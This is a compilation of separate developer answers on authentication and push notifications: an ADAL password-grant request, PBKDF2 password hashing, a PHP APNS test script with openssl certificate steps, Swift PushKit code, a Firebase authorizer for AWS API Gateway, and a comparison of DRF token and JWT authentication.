var token = authContext.AcquireTokenAsync(resource, clientId, userPasswordCredential).Result.AccessToken;

And if you are developing a web app (this is not a common scenario), there is no such method in ADAL v3 to support it. As a workaround, you may construct the request yourself. Here is an example for your reference:

POST: https://login.microsoftonline.com/xxxxx.onmicrosoft.com/oauth2/token
Content-Type: application/x-www-form-urlencoded

resource={resource}&client_id={clientId}&grant_type=password&username={userName}&password={password}&scope=openid&client_secret={clientSecret}
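If you do end up constructing the request yourself, the body is ordinary form encoding. A small Python sketch of building it follows; all of the placeholder values are mine, so substitute your own tenant, app registration and credentials.

```python
from urllib.parse import urlencode

# Hypothetical values -- replace with your tenant, client and credentials.
token_endpoint = "https://login.microsoftonline.com/xxxxx.onmicrosoft.com/oauth2/token"
body = urlencode({
    "resource": "https://graph.windows.net",
    "client_id": "11111111-2222-3333-4444-555555555555",
    "grant_type": "password",
    "username": "user@xxxxx.onmicrosoft.com",
    "password": "hunter2",
    "scope": "openid",
    "client_secret": "app-secret",
})
# POST `body` to token_endpoint with
# Content-Type: application/x-www-form-urlencoded
print("grant_type=password" in body)  # True
```

Using urlencode rather than string concatenation makes sure special characters in the password or secret are percent-encoded correctly.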
User credentials (≈passwords) are among the most valuable assets stored in an application. They are a prime target for attackers, and as a developer, you want to protect them the best you can. The principle of defense in depth (and common sense) indicates that the more layers of protection you can put around something, the more secure it will be. So as you also mentioned, the purpose of hashing passwords is that even if there is a breach, an attacker still can't get hold of actual user credentials. The problem with encryption is always key management. If passwords were stored encrypted, they would need to be decrypted (or the received password encrypted with the same key) to be able to verify a password. For this, the application would need to have access to the key. But that negates the purpose of encryption, an attacker would also have access to the key in case of a breach. (Public key cryptography could make it somewhat more difficult, but essentially the same problem of key management would still persist.) So in short, only storing salted hashes with an algorithm that is slow enough to prevent brute-force attacks (like PBKDF2 or Bcrypt) is both the simplest and the most secure. (Also note that plain salted hashes are not good enough anymore.)
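A minimal sketch of the recommended approach, using only Python's standard library (PBKDF2 here; Bcrypt or Argon2 via a third-party package are equally good choices). The salt is stored in the clear next to the hash, and verification recomputes the hash rather than decrypting anything, so there is no key to manage.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # tune upward until hashing is as slow as you can tolerate

def hash_password(password: str) -> bytes:
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt + dk  # the salt is not secret; it only defeats precomputation

def check_password(password: str, stored: bytes) -> bool:
    salt, dk = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, dk)  # constant-time comparison

record = hash_password("correct horse battery staple")
print(check_password("correct horse battery staple", record))  # True
print(check_password("tr0ub4dor&3", record))                   # False
```

The per-user random salt is what makes this a "salted hash" rather than a plain one: identical passwords produce different records, so precomputed tables are useless.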
You can create your own PHP file. Source: https://github.com/hasyapanchasara/PushKit_SilentPushNotification

Use the structure below to achieve your task. Use this simplepush.php file:

<?php

// Put your device token here (without spaces):
$deviceToken = '1234567890123456789';

// Put your private key's passphrase here:
$passphrase = 'ProjectName';

// Put your alert message here:
$message = 'My first push notification!';

$ctx = stream_context_create();
stream_context_set_option($ctx, 'ssl', 'local_cert', 'PemFileName.pem');
stream_context_set_option($ctx, 'ssl', 'passphrase', $passphrase);

// Open a connection to the APNS server
$fp = stream_socket_client(
    // 'ssl://gateway.push.apple.com:2195', $err,
    'ssl://gateway.sandbox.push.apple.com:2195', $err,
    $errstr, 60, STREAM_CLIENT_CONNECT|STREAM_CLIENT_PERSISTENT, $ctx);

if (!$fp)
    exit("Failed to connect: $err $errstr" . PHP_EOL);

echo 'Connected to APNS' . PHP_EOL;

// Create the payload body
$body['aps'] = array(
    'content-available' => 1,
    'alert' => $message,
    'sound' => 'default',
    'badge' => 0,
);

// Encode the payload as JSON
$payload = json_encode($body);

// Build the binary notification
$msg = chr(0) . pack('n', 32) . pack('H*', $deviceToken) . pack('n', strlen($payload)) . $payload;

// Send it to the server
$result = fwrite($fp, $msg, strlen($msg));

if (!$result)
    echo 'Message not delivered' . PHP_EOL;
else
    echo 'Message successfully delivered' . PHP_EOL;

// Close the connection to the server
fclose($fp);

Use the commands below to create the .pem file used in the code above:

# Convert the .cer to .pem:
$ openssl x509 -in aps_development.cer -inform der -out PushCert.pem

# Convert .p12 to .pem. Enter the pass phrase you gave while creating the
# .p12 certificate; the PEM pass phrase is the same as the .p12 one.
$ openssl pkcs12 -nocerts -out PushKey1.pem -in pushkey.p12
Enter Import Password:
MAC verified OK
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

# Remove the pass phrase from the key so it can be accessed globally:
$ openssl rsa -in PushKey1.pem -out PushKey1_Rmv.pem
Enter pass phrase for PushKey1.pem:
writing RSA key

(This step also solved my stream_socket_client() & certificate capath warnings.)

# Join the two .pem files into one:
$ cat PushCert.pem PushKey1_Rmv.pem > ApnsDev.pem

After that, go to the simplepush.php location and run: php simplepush.php

This way you can test your PushKit notification setup architecture.

https://zeropush.com/guide/guide-to-pushkit-and-voip
https://www.raywenderlich.com/123862/push-notifications-tutorial

Updated Swift code:

import UIKit
import PushKit

@UIApplicationMain
class AppDelegate: UIResponder, UIApplicationDelegate, PKPushRegistryDelegate {

    var window: UIWindow?
    var isUserHasLoggedInWithApp: Bool = true
    var checkForIncomingCall: Bool = true
    var userIsHolding: Bool = true

    func application(application: UIApplication, didFinishLaunchingWithOptions launchOptions: [NSObject: AnyObject]?) -> Bool {
        if #available(iOS 8.0, *) {
            let viewAccept = UIMutableUserNotificationAction()
            viewAccept.identifier = "VIEW_ACCEPT"
            viewAccept.title = "Accept"
            viewAccept.activationMode = .Foreground
            viewAccept.destructive = false
            viewAccept.authenticationRequired = false

            let viewDecline = UIMutableUserNotificationAction()
            viewDecline.identifier = "VIEW_DECLINE"
            viewDecline.title = "Decline"
            viewDecline.activationMode = .Background
            viewDecline.destructive = true
            viewDecline.authenticationRequired = false

            let INCOMINGCALL_CATEGORY = UIMutableUserNotificationCategory()
            INCOMINGCALL_CATEGORY.identifier = "INCOMINGCALL_CATEGORY"
            INCOMINGCALL_CATEGORY.setActions([viewAccept, viewDecline], forContext: .Default)

            if application.respondsToSelector("isRegisteredForRemoteNotifications") {
                let categories = NSSet(array: [INCOMINGCALL_CATEGORY])
                let types: UIUserNotificationType = ([.Alert, .Sound, .Badge])
                let settings: UIUserNotificationSettings = UIUserNotificationSettings(forTypes: types, categories: categories as? Set<UIUserNotificationCategory>)
                application.registerUserNotificationSettings(settings)
                application.registerForRemoteNotifications()
            }
        } else {
            let types: UIRemoteNotificationType = [.Alert, .Badge, .Sound]
            application.registerForRemoteNotificationTypes(types)
        }

        self.PushKitRegistration()
        return true
    }

    //MARK: - PushKitRegistration

    func PushKitRegistration() {
        let mainQueue = dispatch_get_main_queue()
        // Create a push registry object
        if #available(iOS 8.0, *) {
            let voipRegistry: PKPushRegistry = PKPushRegistry(queue: mainQueue)
            // Set the registry's delegate to self
            voipRegistry.delegate = self
            // Set the push type to VoIP
            voipRegistry.desiredPushTypes = [PKPushTypeVoIP]
        } else {
            // Fallback on earlier versions
        }
    }

    @available(iOS 8.0, *)
    func pushRegistry(registry: PKPushRegistry!, didUpdatePushCredentials credentials: PKPushCredentials!, forType type: String!) {
        // Register the VoIP push token (a property of PKPushCredentials) with your server
        let hexString: String = UnsafeBufferPointer<UInt8>(
            start: UnsafePointer(credentials.token.bytes),
            count: credentials.token.length
        ).map { String(format: "%02x", $0) }.joinWithSeparator("")
        print(hexString)
    }

    @available(iOS 8.0, *)
    func pushRegistry(registry: PKPushRegistry!, didReceiveIncomingPushWithPayload payload: PKPushPayload!, forType type: String!) {
        // Process the received push.
        // The code below schedules a local notification once the PushKit payload is received.
        var arrTemp = [NSObject: AnyObject]()
        arrTemp = payload.dictionaryPayload

        let dict: Dictionary<String, AnyObject> = arrTemp["aps"] as! Dictionary<String, AnyObject>

        if isUserHasLoggedInWithApp // Only proceed if this flag is set
        {
            if UIApplication.sharedApplication().applicationState == UIApplicationState.Background ||
               UIApplication.sharedApplication().applicationState == UIApplicationState.Inactive {
                if checkForIncomingCall // Check this flag to know whether it is an incoming call or something else
                {
                    var strTitle: String = dict["alertTitle"] as? String ?? ""
                    let strBody: String = dict["alertBody"] as? String ?? ""
                    strTitle = strTitle + "\n" + strBody

                    let notificationIncomingCall = UILocalNotification()
                    notificationIncomingCall.fireDate = NSDate(timeIntervalSinceNow: 1)
                    notificationIncomingCall.alertBody = strTitle
                    notificationIncomingCall.alertAction = "Open"
                    notificationIncomingCall.soundName = "SoundFile.mp3"
                    notificationIncomingCall.category = dict["category"] as? String ?? "" // As per the payload you receive
                    notificationIncomingCall.userInfo = ["key1": "Value1", "key2": "Value2"]

                    UIApplication.sharedApplication().scheduleLocalNotification(notificationIncomingCall)
                } else {
                    // something else
                }
            }
        }
    }

    //MARK: - Local Notification Methods

    func application(application: UIApplication, didReceiveLocalNotification notification: UILocalNotification) {
        // Your interactive local notification events will be called at this place
    }
}
We are doing the same. We started with Cognito but moved to Firebase because we were not satisfied with the way the AWS Android SDK implements the authentication flow with Google and Facebook: the code is quite old, makes use of deprecated methods, and generally requires rewriting. Firebase authentication, on the other hand, works seamlessly.

When you don't use Cognito, you need to implement a custom authorizer in AWS API Gateway, which is quite easy and is described in https://aws.amazon.com/blogs/mobile/integrating-amazon-cognito-user-pools-with-api-gateway/. Firebase instructions for token validation are at https://firebase.google.com/docs/auth/admin/verify-id-tokens

The following is an excerpt of my authorizer's code:

'use strict';

// Firebase initialization
// console.log('Loading function');
const admin = require("firebase-admin");
admin.initializeApp({
    credential: admin.credential.cert("xxx.json"),
    databaseURL: "https://xxx.firebaseio.com"
});

// Standard AWS AuthPolicy - don't touch !!
...
// END Standard AWS AuthPolicy - don't touch !!

exports.handler = (event, context, callback) => {
    // console.log('Client token:', event.authorizationToken);
    // console.log('Method ARN:', event.methodArn);

    // Validate the incoming token and produce the principal user identifier
    // associated with it; this is accomplished by Firebase Admin.
    admin.auth().verifyIdToken(event.authorizationToken)
        .then(function(decodedToken) {
            let principalId = decodedToken.uid;
            // console.log(JSON.stringify(decodedToken));

            // If the token is valid, a policy must be generated which will allow or deny access to the client.
            // If access is denied, the client will receive a 403 Access Denied response.
            // If access is allowed, API Gateway will proceed with the backend integration
            // configured on the method that was called.

            // Build apiOptions for the AuthPolicy
            const apiOptions = {};
            const tmp = event.methodArn.split(':');
            const apiGatewayArnTmp = tmp[5].split('/');
            const awsAccountId = tmp[4];
            apiOptions.region = tmp[3];
            apiOptions.restApiId = apiGatewayArnTmp[0];
            apiOptions.stage = apiGatewayArnTmp[1];
            const method = apiGatewayArnTmp[2];
            let resource = '/'; // root resource
            if (apiGatewayArnTmp[3]) {
                resource += apiGatewayArnTmp[3];
            }

            // This function must generate a policy that is associated with the recognized principal user identifier.
            // Depending on your use case, you might store policies in a DB, or generate them on the fly.
            // Keep in mind, the policy is cached for 5 minutes by default (TTL is configurable in the authorizer)
            // and will apply to subsequent calls to any method/resource in the RestApi made with the same token.

            // The policy below grants access to all resources in the RestApi
            const policy = new AuthPolicy(principalId, awsAccountId, apiOptions);
            policy.allowAllMethods();
            // policy.denyAllMethods();
            // policy.allowMethod(AuthPolicy.HttpVerb.GET, "/users/username");

            // Finally, build the policy and exit the function
            callback(null, policy.build());
        })
        .catch(function(error) {
            // Firebase throws an error when the token is not valid.
            // You can send a 401 Unauthorized response to the client by failing like so:
            console.error(error);
            callback("Unauthorized");
        });
};

We are not in production yet, but tests on the authorizer show that it behaves correctly with Google, Facebook and password authentication, and it is also very quick (60 - 200 ms). The only drawback I can see is that you will be charged for the authorizer Lambda function, while the Cognito integrated authorizer is free.

Update after almost 1 yr

I moved away from the API Gateway custom authorizer, mainly because I've not been able to automate its deployment with CloudFormation scripts. My solution now is to authenticate directly within the API, caching tokens for some time (like the authorizer does) to avoid excessive validations.
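The `methodArn` string-splitting done in the handler can be easy to get wrong; here is the same parsing logic sketched in Python against an ARN of the documented shape `arn:aws:execute-api:{region}:{account}:{apiId}/{stage}/{verb}/{resource}` (the concrete values below are made up for illustration):

```python
def parse_method_arn(method_arn: str) -> dict:
    """Mirror of the handler's split logic for an API Gateway method ARN."""
    tmp = method_arn.split(":")
    gateway = tmp[5].split("/")  # "{apiId}/{stage}/{verb}/{resource...}"
    return {
        "awsAccountId": tmp[4],
        "region": tmp[3],
        "restApiId": gateway[0],
        "stage": gateway[1],
        "method": gateway[2],
        # root resource unless a first path segment is present
        "resource": "/" + gateway[3] if len(gateway) > 3 else "/",
    }

info = parse_method_arn(
    "arn:aws:execute-api:us-east-1:123456789012:abcdef123/dev/GET/users")
```

Like the JavaScript original, this only captures the first path segment of the resource; deeper paths would need the remaining `gateway[3:]` segments joined back together.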
They both carry out similar tasks, with a few differences.

Token

DRF's built-in Token Authentication
- One token for all sessions
- No timestamp on the token

DRF JWT Token Authentication
- One token per session
- Expiry timestamp on each token

Database access

DRF's built-in Token Authentication
- Database access to fetch the user associated with the token
- Verify the user's status
- Authenticate the user

DRF JWT Token Authentication
- Decode the token (get the payload)
- Verify the token timestamp (expiry)
- Database access to fetch the user associated with the id in the payload
- Verify the user's status
- Authenticate the user

Pros

DRF's built-in Token Authentication
- Allows forced logout by replacing the token in the database (e.g. on password change)

DRF JWT Token Authentication
- Token with an expiration time
- No database hit unless the token is valid

Cons

DRF's built-in Token Authentication
- Database hit on all requests
- Single token for all sessions

DRF JWT Token Authentication
- Unable to recall the token without tracking it in the database
- Once the token is issued, anyone with the token can make requests
- Specs are open to interpretation; no consensus on how to do refresh
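The "decode token, verify expiry, then hit the database" flow is easy to see if you unpack a JWT by hand. The sketch below builds a toy token and reads its payload; it deliberately skips signature verification (real code must verify the signature first, e.g. via a JWT library), and the claim names and values are made up for the demo:

```python
import base64
import json
import time

def _b64(obj: dict) -> str:
    """URL-safe base64 of a JSON object, unpadded, as JWT segments are."""
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")

def decode_jwt_payload(token: str) -> dict:
    """Decode only the payload segment of a JWT (no signature check -
    illustration of where the expiry timestamp lives, nothing more)."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore base64 padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

def is_expired(payload: dict, now: float = None) -> bool:
    """True once the 'exp' claim (seconds since epoch) has passed."""
    return (now if now is not None else time.time()) >= payload["exp"]

# Toy token: header.payload.signature
token = ".".join([_b64({"alg": "HS256"}),
                  _b64({"user_id": 7, "exp": 1_700_000_000}),
                  "fake-signature"])
payload = decode_jwt_payload(token)
```

This is why JWT authentication can reject an expired or malformed token without any database hit: the expiry check needs only the payload, and the database is consulted only afterwards to load the user for `user_id`.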